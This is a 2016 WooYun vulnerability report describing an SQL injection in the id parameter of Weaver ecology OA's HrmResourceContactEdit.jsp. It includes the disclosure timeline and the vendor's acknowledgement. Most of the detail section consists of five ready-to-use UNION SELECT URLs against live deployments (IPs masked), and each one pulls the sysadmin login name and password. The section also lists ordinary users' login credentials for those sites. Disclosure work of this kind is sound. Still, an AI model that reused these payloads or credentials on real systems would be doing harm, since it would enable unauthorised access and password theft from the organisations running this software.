当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191882

漏洞标题:泛微ecology系统所有版本SQL注入(官网为例)二

相关厂商:上海泛微网络科技股份有限公司

漏洞作者: 天边

提交时间:2016-04-03 13:02

修复时间:2016-07-02 14:00

公开时间:2016-07-02 14:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-03: 厂商已经确认,细节仅向厂商公开
2016-04-06: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-05-28: 细节向核心白帽子及相关领域专家公开
2016-06-07: 细节向普通白帽子公开
2016-06-17: 细节向实习白帽子公开
2016-07-02: 细节向公众公开

简要描述:

详细说明:

注入点:/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29&isView=1
注入参数为id
需要普通用户登录。
案例一:
在官网用手机号码登陆后进行测试,登陆后访问:
http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

ecology11.png


由于版本不一样,所以字段数不一样,但是注入点是相同的。
案例二:http://**.**.**.**:812/login/Login.jsp?logintype=1
程凯/111111。登陆后访问:
http://**.**.**.**:812/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

ecology12.png


案例三:http://**.**.**.**/login/Login.jsp?logintype=1
wangp/111111。登陆访问
http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

ecology13.png


案例四:http://**.**.**.**:18881/login/login.jsp
guobg/1。这个字段数是92
登陆访问:
http://**.**.**.**:18881/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=88%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

ecology14.png


案例五:**.**.**.**:8080/login/Login.jsp?logintype=1
杨先坤/111。字段数为105
登陆后访问:**.**.**.**:8080/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=35%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

ecology16.png


测试的版本包括:8.100.0531+KB81001511、 7.100.0331 、5.000.0327+KB50001107、 4.100.0919

漏洞证明:

修复方案:

版权声明:转载请注明来源 天边@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-03 13:59

厂商回复:

谢谢,我们将尽快部署安全补丁

最新状态:

暂无


漏洞评价:

评价